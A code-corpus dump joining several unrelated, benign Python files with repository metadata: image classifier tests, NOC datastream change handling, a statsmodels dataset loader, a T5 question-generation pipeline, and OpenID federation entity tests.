options = _ImageClassifierOptions(base_options=base_options)
_ImageClassifier.create_from_options(options)
def test_create_from_options_succeeds_with_valid_model_content(self):
# Creates with options containing model content successfully.
with open(self.model_path, 'rb') as f:
base_options = _BaseOptions(file_content=f.read())
options = _ImageClassifierOptions(base_options=base_options)
classifier = _ImageClassifier.create_from_options(options)
self.assertIsInstance(classifier, _ImageClassifier)
@parameterized.parameters(
(ModelFileType.FILE_NAME, 3, _EXPECTED_CLASSIFICATION_RESULT),
(ModelFileType.FILE_CONTENT, 3, _EXPECTED_CLASSIFICATION_RESULT))
def test_classify_model(self, model_file_type, max_results,
expected_classification_result):
# Creates classifier.
if model_file_type is ModelFileType.FILE_NAME:
base_options = _BaseOptions(file_name=self.model_path)
elif model_file_type is ModelFileType.FILE_CONTENT:
with open(self.model_path, 'rb') as f:
model_content = f.read()
base_options = _BaseOptions(file_content=model_content)
else:
# Should never happen
raise ValueError('model_file_type is invalid.')
classifier = _create_classifier_from_options(
base_options, max_results=max_results)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
# Comparing results (classification w/o bounding box).
self.assertProtoEquals(image_result.to_pb2(),
expected_classification_result.to_pb2())
def test_classify_model_with_bounding_box(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(base_options, max_results=3)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Bounding box in "burger.jpg" corresponding to "burger_crop.jpg".
bounding_box = bounding_box_pb2.BoundingBox(
origin_x=0, origin_y=0, width=400, height=325)
# Classifies the input.
image_result = classifier.classify(image, bounding_box)
# Expected results.
expected_classification_result = _ClassificationResult(classifications=[
_Classifications(
categories=[
_Category(
index=934,
score=0.881507,
display_name='',
category_name='cheeseburger'),
_Category(
index=925,
score=0.019457,
display_name='',
category_name='guacamole'),
_Category(
index=932,
score=0.012489,
display_name='',
category_name='bagel')
],
head_index=0,
head_name='')
])
# Comparing results (classification w/ bounding box).
self.assertProtoEquals(image_result.to_pb2(),
expected_classification_result.to_pb2())
def test_max_results_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, max_results=_MAX_RESULTS)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
self.assertLessEqual(
len(categories), _MAX_RESULTS, 'Too many results returned.')
def test_score_threshold_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, score_threshold=_SCORE_THRESHOLD)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
for category in categories:
self.assertGreaterEqual(
category.score, _SCORE_THRESHOLD,
f'Classification with score lower than threshold found. {category}')
def test_allowlist_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, category_name_allowlist=_ALLOW_LIST)
# Loads image.
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
for category in categories:
label = category.category_name
self.assertIn(label, _ALLOW_LIST,
f'Label {label} found but not in label allow list')
def test_denylist_option(self):
# Creates classifier.
base_options = _BaseOptions(file_name=self.model_path)
classifier = _create_classifier_from_options(
base_options, score_threshold=0.01, category_name_denylist=_DENY_LIST)
# Loads image
image = tensor_image.TensorImage.create_from_file(self.test_image_path)
# Classifies the input.
image_result = classifier.classify(image, bounding_box=None)
categories = image_result.classifications[0].categories
for category in categories:
label = category.category_name
self.assertNotIn(label, _DENY_LIST,
f'Label {label} found but in deny list.')
def test_combined_allowlist_and_denylist(self):
# Fails with combined allowlist and denylist
with self.assertRaisesRegex(
ValueError,
r'`class_name_whitelist` and `class_name_blacklist` are mutually '
r'exclusive options.'):
base_options = _BaseOptions(file_name=self.model_path)
classification_options = classification_options_pb2.ClassificationOptions(
category_name_allowlist=['foo'], category_name_denylist=['bar'])
options = _ImageClassifierOptions(
base_options=base_options,
classification_options=classification_options)
_ImageClassifier.create_from_options(options)
if __name__ == '__main__':
tf.test.main()
| 37.907801
| 90
| 0.724228
|
9197cb6e3a218c9c6f7dc65d7d2de551ba0668fd
| 103
|
py
|
Python
|
python3/func.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/func.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/func.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
def spam():
eggs = 99
bacon()
print(eggs)
def bacon():
ham = 101
eggs = 0
spam()
| 10.3
| 15
| 0.485437
|
79b3da64c89f9152072afde814c1596079a73445
| 2,366
|
py
|
Python
|
core/datastream/change.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | 1
|
2019-09-20T09:36:48.000Z
|
2019-09-20T09:36:48.000Z
|
core/datastream/change.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
core/datastream/change.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# DataStream change notification
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import logging
import threading
import contextlib
# NOC modules
from noc.core.defer import call_later
from noc.core.datastream.loader import loader
tls = threading.local()
logger = logging.getLogger(__name__)
def register_changes(data):
"""
    Register a batch of datastream changes
    :param data: List of (datastream name, object id)
:return:
"""
if hasattr(tls, "_datastream_changes"):
# Within bulk_datastream_changes context
tls._datastream_changes.update(data)
else:
apply_changes(data)
@contextlib.contextmanager
def bulk_datastream_changes():
"""
Buffer and deduplicate pending datastream changes
Usage:
    with bulk_datastream_changes():
....
:return:
"""
# Save previous state
last_changes = getattr(tls, "_datastream_changes", None)
# Create new context
tls._datastream_changes = set()
# Perform decorated computations
yield
# Apply changes
apply_changes(list(tls._datastream_changes))
# Restore previous context
if last_changes is not None:
tls._datastream_changes = last_changes
else:
del tls._datastream_changes
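# Illustrative sketch (comment only; datastream names and ids are hypothetical): calls made
# inside the context are buffered and deduplicated, then applied once on exit.
#   with bulk_datastream_changes():
#       register_changes([("managedobject", "1"), ("managedobject", "1")])
#       register_changes([("administrativedomain", "2")])
#   # -> apply_changes() runs once with the deduplicated set of changes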
def apply_changes(changes):
"""
:param changes: List of (datastream name, object id)
:return:
"""
if changes:
call_later("noc.core.datastream.change.do_changes", changes=changes)
def update_object(ds_name, object_id):
"""
Really apply DataStream updates
:param ds_name:
:param object_id:
:return:
"""
ds = loader[ds_name]
if not ds:
return
r = ds.update_object(object_id)
if r:
logger.info("[%s|%s] Object has been changed", ds_name, object_id)
else:
logger.info("[%s|%s] Object hasn't been changed", ds_name, object_id)
def do_changes(changes):
"""
Change calculation worker
    :param changes: List of (datastream name, object id)
:return:
"""
for ds_name, object_id in sorted(changes):
update_object(ds_name, object_id)
| 24.645833
| 77
| 0.610313
|
a759be85790b9d4d4dbe38e7c7e37eed3c3ad62a
| 2,525
|
py
|
Python
|
statsmodels/datasets/committee/data.py
|
escheffel/statsmodels
|
bc70147c4c7ea00b6ac7256bbaf107902983c189
|
[
"BSD-3-Clause"
] | 2
|
2017-01-05T22:44:37.000Z
|
2018-04-26T08:34:00.000Z
|
statsmodels/datasets/committee/data.py
|
changhiskhan/statsmodels
|
af26395e8b75b112ae7b3099532aefd8d002b8ca
|
[
"BSD-3-Clause"
] | null | null | null |
statsmodels/datasets/committee/data.py
|
changhiskhan/statsmodels
|
af26395e8b75b112ae7b3099532aefd8d002b8ca
|
[
"BSD-3-Clause"
] | null | null | null |
"""First 100 days of the US House of Representatives 1995"""
__docformat__ = 'restructuredtext'
COPYRIGHT = """Used with express permission from the original author,
who retains all rights."""
TITLE = __doc__
SOURCE = """
Jeff Gill's `Generalized Linear Models: A Unified Approach`
http://jgill.wustl.edu/research/books.html
"""
DESCRSHORT = """Number of bill assignments in the 104th House in 1995"""
DESCRLONG = """The example in Gill, seeks to explain the number of bill
assignments in the first 100 days of the US' 104th House of Representatives.
The response variable is the number of bill assignments in the first 100 days
over 20 Committees. The explanatory variables in the example are the number of
assignments in the first 100 days of the 103rd House, the number of members on
the committee, the number of subcommittees, the log of the number of staff
assigned to the committee, a dummy variable indicating whether
the committee is a high prestige committee, and an interaction term between
the number of subcommittees and the log of the staff size.
The data returned by load are not cleaned to represent the above example.
"""
NOTE = """Number of Observations - 20
Number of Variables - 6
Variable name definitions::
BILLS104 - Number of bill assignments in the first 100 days of the 104th
House of Representatives.
SIZE - Number of members on the committee.
SUBS - Number of subcommittees.
STAFF - Number of staff members assigned to the committee.
PRESTIGE - PRESTIGE == 1 is a high prestige committee.
BILLS103 - Number of bill assignments in the first 100 days of the 103rd
House of Representatives.
Committee names are included as a variable in the data file though not
returned by load.
"""
from numpy import recfromtxt, column_stack, array
import statsmodels.tools.datautils as du
from os.path import dirname, abspath
def load():
"""Load the committee data and returns a data class.
Returns
--------
Dataset instance:
See DATASET_PROPOSAL.txt for more information.
"""
data = _get_data()
return du.process_recarray(data, endog_idx=0, dtype=float)
def load_pandas():
data = _get_data()
return du.process_recarray_pandas(data, endog_idx=0, dtype=float)
def _get_data():
filepath = dirname(abspath(__file__))
data = recfromtxt(open(filepath + '/committee.csv', 'rb'), delimiter=",",
names=True, dtype=float, usecols=(1,2,3,4,5,6))
return data
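# Minimal usage sketch (comment only; assumes the standard statsmodels datasets layout):
#   from statsmodels.datasets import committee
#   data = committee.load()
#   data.endog[:3]  # BILLS104 counts
#   data.exog[:3]   # remaining columns listed in NOTE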
| 35.069444
| 79
| 0.725149
|
ede6f55df27cbc102012eb8d7a7312413cdb6ded
| 13,895
|
py
|
Python
|
pipelines.py
|
flash-ai-fydp/question_generation
|
fba1e2292e26207b99db8dc783536b9bf51d786e
|
[
"MIT"
] | null | null | null |
pipelines.py
|
flash-ai-fydp/question_generation
|
fba1e2292e26207b99db8dc783536b9bf51d786e
|
[
"MIT"
] | null | null | null |
pipelines.py
|
flash-ai-fydp/question_generation
|
fba1e2292e26207b99db8dc783536b9bf51d786e
|
[
"MIT"
] | null | null | null |
import itertools
import logging
from typing import Optional, Dict, Union
from nltk import sent_tokenize
import torch
from transformers import(
AutoModelForSeq2SeqLM,
AutoTokenizer,
PreTrainedModel,
PreTrainedTokenizer,
)
logger = logging.getLogger(__name__)
class QGPipeline:
"""Poor man's QG pipeline"""
def __init__(
self,
model: PreTrainedModel,
tokenizer: PreTrainedTokenizer,
ans_model: PreTrainedModel,
ans_tokenizer: PreTrainedTokenizer,
qg_format: str,
use_cuda: bool
):
self.model = model
self.tokenizer = tokenizer
self.ans_model = ans_model
self.ans_tokenizer = ans_tokenizer
self.qg_format = qg_format
self.device = "cuda" if torch.cuda.is_available() and use_cuda else "cpu"
self.model.to(self.device)
if self.ans_model is not self.model:
self.ans_model.to(self.device)
assert self.model.__class__.__name__ in [
"T5ForConditionalGeneration", "BartForConditionalGeneration"]
if "T5ForConditionalGeneration" in self.model.__class__.__name__:
self.model_type = "t5"
else:
self.model_type = "bart"
def __call__(self, inputs: str):
inputs = " ".join(inputs.split())
sents, answers = self._extract_answers(inputs)
flat_answers = list(itertools.chain(*answers))
if len(flat_answers) == 0:
return []
if self.qg_format == "prepend":
qg_examples = self._prepare_inputs_for_qg_from_answers_prepend(
inputs, answers)
else:
qg_examples = self._prepare_inputs_for_qg_from_answers_hl(
sents, answers)
qg_inputs = [example['source_text'] for example in qg_examples]
questions = self._generate_questions(qg_inputs)
output = [{'answer': example['answer'], 'question': que}
for example, que in zip(qg_examples, questions)]
return output
def _generate_questions(self, inputs):
inputs = self._tokenize(inputs, padding=True, truncation=True)
outs = self.model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
max_length=32,
num_beams=4,
)
questions = [self.tokenizer.decode(
ids, skip_special_tokens=True) for ids in outs]
return questions
def _extract_answers(self, context):
sents, inputs = self._prepare_inputs_for_ans_extraction(context)
inputs = self._tokenize(inputs, padding=True, truncation=True)
outs = self.ans_model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
max_length=32,
)
dec = [self.ans_tokenizer.decode(
ids, skip_special_tokens=False) for ids in outs]
answers = [item.split('<sep>') for item in dec]
answers = [i[:-1] for i in answers]
return sents, answers
def _tokenize(self,
inputs,
padding=True,
truncation=True,
add_special_tokens=True,
max_length=512
):
inputs = self.tokenizer.batch_encode_plus(
inputs,
max_length=max_length,
add_special_tokens=add_special_tokens,
truncation=truncation,
padding="max_length" if padding else False,
pad_to_max_length=padding,
return_tensors="pt"
)
return inputs
def _prepare_inputs_for_ans_extraction(self, text):
sents = sent_tokenize(text)
inputs = []
for i in range(len(sents)):
source_text = "extract answers:"
for j, sent in enumerate(sents):
if i == j:
sent = "<hl> %s <hl>" % sent
source_text = "%s %s" % (source_text, sent)
source_text = source_text.strip()
if self.model_type == "t5":
source_text = source_text + " </s>"
inputs.append(source_text)
return sents, inputs
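    # Example of the prepared input (illustrative): for the text
    # "Python is great. It is popular.", the first element of `inputs` is
    #   "extract answers: <hl> Python is great. <hl> It is popular. </s>"
    # (the trailing " </s>" is appended only for t5-type models).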
def _prepare_inputs_for_qg_from_answers_hl(self, sents, answers):
inputs = []
for i, answer in enumerate(answers):
if len(answer) == 0:
continue
for answer_text in answer:
try:
sent = sents[i]
sents_copy = sents[:]
answer_text = answer_text.strip()
ans_start_idx = sent.index(answer_text)
sent = f"{sent[:ans_start_idx]} <hl> {answer_text} <hl> {sent[ans_start_idx + len(answer_text): ]}"
sents_copy[i] = sent
source_text = " ".join(sents_copy)
source_text = f"generate question: {source_text}"
if self.model_type == "t5":
source_text = source_text + " </s>"
inputs.append(
{"answer": answer_text, "source_text": source_text})
except Exception as e:
logger.exception("Error getting answer %s" % e)
return inputs
def _prepare_inputs_for_qg_from_answers_prepend(self, context, answers):
flat_answers = list(itertools.chain(*answers))
examples = []
for answer in flat_answers:
source_text = f"answer: {answer} context: {context}"
if self.model_type == "t5":
source_text = source_text + " </s>"
examples.append({"answer": answer, "source_text": source_text})
return examples
class MultiTaskQAQGPipeline(QGPipeline):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def __call__(self, inputs: Union[Dict, str]):
if type(inputs) is str:
# do qg
return super().__call__(inputs)
else:
# do qa
return self._extract_answer(inputs["question"], inputs["context"])
def _prepare_inputs_for_qa(self, question, context):
source_text = f"question: {question} context: {context}"
if self.model_type == "t5":
source_text = source_text + " </s>"
return source_text
def _extract_answer(self, question, context):
source_text = self._prepare_inputs_for_qa(question, context)
inputs = self._tokenize([source_text], padding=False)
outs = self.model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
max_length=16,
)
answer = self.tokenizer.decode(outs[0], skip_special_tokens=True)
return answer
class E2EQGPipeline:
def __init__(
self,
model: PreTrainedModel,
tokenizer: PreTrainedTokenizer,
use_cuda: bool
):
self.model = model
self.tokenizer = tokenizer
self.device = "cuda" if torch.cuda.is_available() and use_cuda else "cpu"
self.model.to(self.device)
assert self.model.__class__.__name__ in [
"T5ForConditionalGeneration", "BartForConditionalGeneration"]
if "T5ForConditionalGeneration" in self.model.__class__.__name__:
self.model_type = "t5"
else:
self.model_type = "bart"
self.default_generate_kwargs = {
"max_length": 256,
"num_beams": 4,
"length_penalty": 1.5,
"no_repeat_ngram_size": 3,
"early_stopping": True,
}
def __call__(self, context: str, **generate_kwargs):
inputs = self._prepare_inputs_for_e2e_qg(context)
        # TODO: when overriding default_generate_kwargs all other arguments need to be passed
# find a better way to do this
if not generate_kwargs:
generate_kwargs = self.default_generate_kwargs
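# A possible refinement (sketch only, not applied here): merge user overrides on top
# of the defaults instead of replacing them wholesale, e.g.
#   generate_kwargs = {**self.default_generate_kwargs, **generate_kwargs}
# so a caller can override a single argument such as num_beams without re-passing the rest.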
input_length = inputs["input_ids"].shape[-1]
# max_length = generate_kwargs.get("max_length", 256)
# if input_length < max_length:
# logger.warning(
# "Your max_length is set to {}, but you input_length is only {}. You might consider decreasing max_length manually, e.g. summarizer('...', max_length=50)".format(
# max_length, input_length
# )
# )
outs = self.model.generate(
input_ids=inputs['input_ids'].to(self.device),
attention_mask=inputs['attention_mask'].to(self.device),
**generate_kwargs
)
prediction = self.tokenizer.decode(outs[0], skip_special_tokens=True)
questions = prediction.split("<sep>")
questions = [question.strip() for question in questions[:-1]]
return questions
def _prepare_inputs_for_e2e_qg(self, context):
source_text = f"generate questions: {context}"
if self.model_type == "t5":
source_text = source_text + " </s>"
inputs = self._tokenize([source_text], padding=False)
return inputs
def _tokenize(
self,
inputs,
padding=True,
truncation=True,
add_special_tokens=True,
max_length=512
):
inputs = self.tokenizer.batch_encode_plus(
inputs,
max_length=max_length,
add_special_tokens=add_special_tokens,
truncation=truncation,
padding="max_length" if padding else False,
pad_to_max_length=padding,
return_tensors="pt"
)
return inputs
SUPPORTED_TASKS = {
"question-generation": {
"impl": QGPipeline,
"default": {
"model": "valhalla/t5-small-qg-hl",
"ans_model": "valhalla/t5-small-qa-qg-hl",
}
},
"multitask-qa-qg": {
"impl": MultiTaskQAQGPipeline,
"default": {
"model": "valhalla/t5-small-qa-qg-hl",
}
},
"e2e-qg": {
"impl": E2EQGPipeline,
"default": {
"model": "valhalla/t5-small-e2e-qg",
}
}
}
def pipeline(
task: str,
model: Optional[Union[str, PreTrainedModel]] = None,
tokenizer: Optional[Union[str, PreTrainedTokenizer]] = None,
qg_format: Optional[str] = "highlight",
ans_model: Optional[Union[str, PreTrainedModel]] = None,
ans_tokenizer: Optional[Union[str, PreTrainedTokenizer]] = None,
use_cuda: Optional[bool] = True,
**kwargs,
):
# Retrieve the task
if task not in SUPPORTED_TASKS:
raise KeyError("Unknown task {}, available tasks are {}".format(
task, list(SUPPORTED_TASKS.keys())))
targeted_task = SUPPORTED_TASKS[task]
task_class = targeted_task["impl"]
# Use default model/config/tokenizer for the task if no model is provided
if model is None:
model = targeted_task["default"]["model"]
# Try to infer tokenizer from model or config name (if provided as str)
if tokenizer is None:
if isinstance(model, str):
tokenizer = model
else:
# Impossible to guess which tokenizer is the right one here
raise Exception(
"Impossible to guess which tokenizer to use. "
"Please provide a PreTrainedTokenizer class or a path/identifier to a pretrained tokenizer."
)
# Instantiate tokenizer if needed
if isinstance(tokenizer, (str, tuple)):
if isinstance(tokenizer, tuple):
# For tuple we have (tokenizer name, {kwargs})
tokenizer = AutoTokenizer.from_pretrained(
tokenizer[0], **tokenizer[1])
else:
tokenizer = AutoTokenizer.from_pretrained(tokenizer)
# Instantiate model if needed
if isinstance(model, str):
model = AutoModelForSeq2SeqLM.from_pretrained(model)
if task == "question-generation":
if ans_model is None:
# load default ans model
ans_model = targeted_task["default"]["ans_model"]
ans_tokenizer = AutoTokenizer.from_pretrained(ans_model)
ans_model = AutoModelForSeq2SeqLM.from_pretrained(ans_model)
else:
# Try to infer tokenizer from model or config name (if provided as str)
if ans_tokenizer is None:
if isinstance(ans_model, str):
ans_tokenizer = ans_model
else:
# Impossible to guess which tokenizer is the right one here
raise Exception(
"Impossible to guess which tokenizer to use. "
"Please provide a PreTrainedTokenizer class or a path/identifier to a pretrained tokenizer."
)
# Instantiate tokenizer if needed
if isinstance(ans_tokenizer, (str, tuple)):
if isinstance(ans_tokenizer, tuple):
# For tuple we have (tokenizer name, {kwargs})
ans_tokenizer = AutoTokenizer.from_pretrained(
ans_tokenizer[0], **ans_tokenizer[1])
else:
ans_tokenizer = AutoTokenizer.from_pretrained(
ans_tokenizer)
if isinstance(ans_model, str):
ans_model = AutoModelForSeq2SeqLM.from_pretrained(ans_model)
if task == "e2e-qg":
return task_class(model=model, tokenizer=tokenizer, use_cuda=use_cuda)
elif task == "question-generation":
return task_class(model=model, tokenizer=tokenizer, ans_model=ans_model, ans_tokenizer=ans_tokenizer, qg_format=qg_format, use_cuda=use_cuda)
else:
return task_class(model=model, tokenizer=tokenizer, ans_model=model, ans_tokenizer=tokenizer, qg_format=qg_format, use_cuda=use_cuda)
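# A minimal usage sketch of the factory above. The default checkpoints declared in
# SUPPORTED_TASKS are fetched from the Hugging Face hub on first use, so the first
# run needs network access; the sample sentences are placeholders.
if __name__ == "__main__":
    qg = pipeline("question-generation")
    print(qg("Python is a programming language. It was created by Guido van Rossum."))
    e2e = pipeline("e2e-qg")
    print(e2e("Python is a programming language created by Guido van Rossum."))
    qa = pipeline("multitask-qa-qg")
    print(qa({"question": "Who created Python?",
              "context": "Python is a programming language created by Guido van Rossum."}))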
| 34.224138
| 179
| 0.59158
|
debae7eecb3a915e6d20c4737934f796dd5c57b7
| 1,794
|
py
|
Python
|
src/m1_motion.py
|
boewebe/06-IntroductionToRobots
|
85df9a4caccd4246e3674753a81fe0ae687090d3
|
[
"MIT"
] | null | null | null |
src/m1_motion.py
|
boewebe/06-IntroductionToRobots
|
85df9a4caccd4246e3674753a81fe0ae687090d3
|
[
"MIT"
] | null | null | null |
src/m1_motion.py
|
boewebe/06-IntroductionToRobots
|
85df9a4caccd4246e3674753a81fe0ae687090d3
|
[
"MIT"
] | null | null | null |
"""
An opportunity to explore how to make an EV3 Robot move.
Authors: Dave Fisher, David Mutchler, Vibha Alangar,
their colleagues, and Brendan Boewe.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
# -----------------------------------------------------------------------------
# TODO: 2.
# Follow along with the lecture to run this program:
# - Using SSH from your computer
# When you have successfully run this program, change this _TODO_ to DONE.
# -----------------------------------------------------------------------------
import simple_rosebotics as rb
import time
def main():
""" Calls the other functions to test/demo them. """
go_two_seconds()
def go_two_seconds():
# -------------------------------------------------------------------------
# TODO: 3.
# Make the robot move, by using this pattern:
# - Turn on (start) the wheel motors.
# - time.sleep(2) # Pause here, let other processes run for 2 seconds
# - Turn off (brake or coast) the wheel motors.
#
# Use the DOT trick to figure out how to start, brake and coast motors.
# -------------------------------------------------------------------------
left_motor = rb.LargeMotor(rb.Plug("B")) # Constructs Motor for left wheel
left_motor.start()
time.sleep(2)
left_motor.brake()
def run_test_go_inches():
""" Tests the go_inches function. """
# TODO: 4. Implement this function with at least 3 calls to go_inches
# with various inches and speeds.
def go_inches(inches, percent_of_max_speed):
"""
Makes the EV3 Robot move the given number of inches at the given speed.
:type inches: float
:type percent_of_max_speed: float -100 to 100
"""
# TODO: 5. Implement and test this function.
main()
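# A possible sketch for TODOs 4-5, kept commented out so the exercise stays open.
# It assumes LargeMotor.start() drives the wheel at full speed, that the right wheel
# is plugged into port "C" (only port "B" appears above), and that the robot covers
# roughly INCHES_PER_SECOND inches per second at full speed -- calibrate on the robot.
#
# INCHES_PER_SECOND = 10.0  # hypothetical calibration constant
#
# def go_inches_sketch(inches, percent_of_max_speed=100):
#     left = rb.LargeMotor(rb.Plug("B"))
#     right = rb.LargeMotor(rb.Plug("C"))
#     left.start()
#     right.start()
#     # Time-based approximation; honoring percent_of_max_speed exactly would need
#     # a speed argument, and that part of the motor API is not shown in this file.
#     time.sleep(inches / INCHES_PER_SECOND)
#     left.brake()
#     right.brake()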
| 32.035714
| 79
| 0.554069
|
7e0647d92db805932df3616a04c69ccd7d1c34eb
| 6,761
|
py
|
Python
|
tests/test_07_oob_entity.py
|
sklemer1/fedoidcmsg
|
b5e48de7a2e55c93915df1b274770134e77888c8
|
[
"Apache-2.0"
] | 1
|
2018-05-09T20:47:06.000Z
|
2018-05-09T20:47:06.000Z
|
tests/test_07_oob_entity.py
|
sklemer1/fedoidcmsg
|
b5e48de7a2e55c93915df1b274770134e77888c8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_07_oob_entity.py
|
sklemer1/fedoidcmsg
|
b5e48de7a2e55c93915df1b274770134e77888c8
|
[
"Apache-2.0"
] | 1
|
2018-10-04T13:55:58.000Z
|
2018-10-04T13:55:58.000Z
|
import os
from urllib.parse import quote_plus
from oidcmsg.key_jar import KeyJar
from oidcmsg.key_jar import build_keyjar
from oidcmsg.key_jar import public_keys_keyjar
from oidcmsg.oauth2 import Message
from fedoidcmsg import MetadataStatement
from fedoidcmsg.bundle import JWKSBundle
from fedoidcmsg.entity import FederationEntity
from fedoidcmsg.entity import FederationEntityOOB
from fedoidcmsg.entity import make_federation_entity
from fedoidcmsg.operator import Operator
from fedoidcmsg.signing_service import InternalSigningService
from fedoidcmsg.test_utils import make_signing_sequence, create_federation_entities
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
def public_jwks_bundle(jwks_bundle):
jb_copy = JWKSBundle('')
for fo, kj in jwks_bundle.bundle.items():
kj_copy = KeyJar()
for owner in kj.owners():
public_keys_keyjar(kj, owner, kj_copy, owner)
jb_copy.bundle[fo] = kj_copy
return jb_copy
def test_get_metadata_statement():
jb = JWKSBundle('')
for iss in ['https://example.org/', 'https://example.com/']:
jb[iss] = build_keyjar(KEYDEFS)[1]
self_signer = InternalSigningService(keyjar=jb['https://example.com/'],
iss='https://example.com/')
op = Operator(self_signer=self_signer, iss='https://example.com/')
req = MetadataStatement(foo='bar')
sms = op.pack_metadata_statement(req, sign_alg='RS256')
sms_dir = {'https://example.com': sms}
req['metadata_statements'] = Message(**sms_dir)
ent = FederationEntity(None, fo_bundle=public_jwks_bundle(jb))
loe = ent.get_metadata_statement(req)
assert loe
def test_add_sms_spec_to_request():
jb = JWKSBundle('')
for iss in ['https://example.org/', 'https://example.com/']:
jb[iss] = build_keyjar(KEYDEFS)[1]
kj = build_keyjar(KEYDEFS)[1]
sign_serv = InternalSigningService('https://signer.example.com',
keyjar=kj)
ent = FederationEntityOOB(None, self_signer=sign_serv,
fo_bundle=public_jwks_bundle(jb),
context='response')
ent.metadata_statements = {
'response': {
'https://example.org/': 'https://example.org/sms1'
}
}
req = MetadataStatement(foo='bar')
ent.add_sms_spec_to_request(req, ['https://example.org/'])
assert 'metadata_statement_uris' in req
def test_add_signing_keys():
kj = build_keyjar(KEYDEFS)[1]
sign_serv = InternalSigningService('https://signer.example.com',
keyjar=kj)
ent = FederationEntityOOB(None, self_signer=sign_serv)
req = MetadataStatement(foo='bar')
ent.add_signing_keys(req)
assert 'signing_keys' in req
_path = os.path.realpath(__file__)
root_dir, _fname = os.path.split(_path)
def test_make_federation_entity():
config = {
'self_signer': {
'private_path': '{}/private_jwks'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/public_jwks'.format(root_dir)
},
'sms_dir': '{}/ms/https%3A%2F%2Fsunet.se'.format(root_dir),
'fo_bundle': {
'private_path': '{}/fo_bundle_signing_keys'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/pub_fo_bundle_signing_keys'.format(root_dir),
'dir': '{}/fo_jwks'.format(root_dir)
}
}
fe = make_federation_entity(config, 'https://op.example.com')
assert fe
assert isinstance(fe, FederationEntityOOB)
assert isinstance(fe.jwks_bundle, JWKSBundle)
assert fe.iss == 'https://op.example.com'
def test_sequence():
config = {
'self_signer': {
'private_path': '{}/private_jwks'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/public_jwks'.format(root_dir)
},
'sms_dir': '{}/ms/https%3A%2F%2Fsunet.se'.format(root_dir),
'fo_bundle': {
'private_path': '{}/fo_bundle_signing_keys'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/pub_fo_bundle_signing_keys'.format(root_dir),
'dir': '{}/fo_jwks'.format(root_dir)
},
'context': 'discovery'
}
fe = make_federation_entity(config, 'https://op.example.com')
req = MetadataStatement(foo='bar')
fe.add_sms_spec_to_request(req)
fe.add_signing_keys(req)
updated_req = fe.self_sign(req, 'https://example.com')
assert updated_req
assert set(updated_req.keys()) == {'foo', 'signing_keys',
'metadata_statements'}
ENTITY = create_federation_entities(['https://op.sunet.se', 'https://sunet.se',
'https://swamid.sunet.se'], KEYDEFS,
root_dir=root_dir)
def test_update_metadata_statement():
make_signing_sequence(['https://op.sunet.se', 'https://sunet.se',
'https://swamid.sunet.se'], ENTITY)
op = ENTITY['https://op.sunet.se']
metadata_statement = MetadataStatement(foo='bar')
metadata_statement = op.update_metadata_statement(metadata_statement)
assert metadata_statement
assert set(metadata_statement.keys()) == {'foo', 'metadata_statements'}
swamid = ENTITY['https://swamid.sunet.se']
# on the RP side
rp = FederationEntityOOB(None, 'https://rp.sunet.se')
# Need the FO bundle, which in this case only needs Swamid's key
jb = JWKSBundle('https://rp.sunet.se')
_kj = KeyJar()
_kj.import_jwks(swamid.self_signer.public_keys(), swamid.iss)
jb['https://swamid.sunet.se'] = _kj
rp.jwks_bundle = jb
l = rp.get_metadata_statement(metadata_statement, MetadataStatement,
'discovery')
assert l[0].iss == 'https://op.sunet.se'
assert l[0].fo == 'https://swamid.sunet.se'
assert l[0].le == {'foo':'bar'}
def test_updating_metadata_no_superior():
op = ENTITY['https://op.sunet.se']
op.metadata_statements['discovery'] = {}
metadata_statement = MetadataStatement(foo='bar')
metadata_statement = op.update_metadata_statement(metadata_statement)
assert metadata_statement
assert set(metadata_statement.keys()) == {'foo', 'metadata_statements'}
# swamid = ENTITY['https://swamid.sunet.se']
# on the RP side
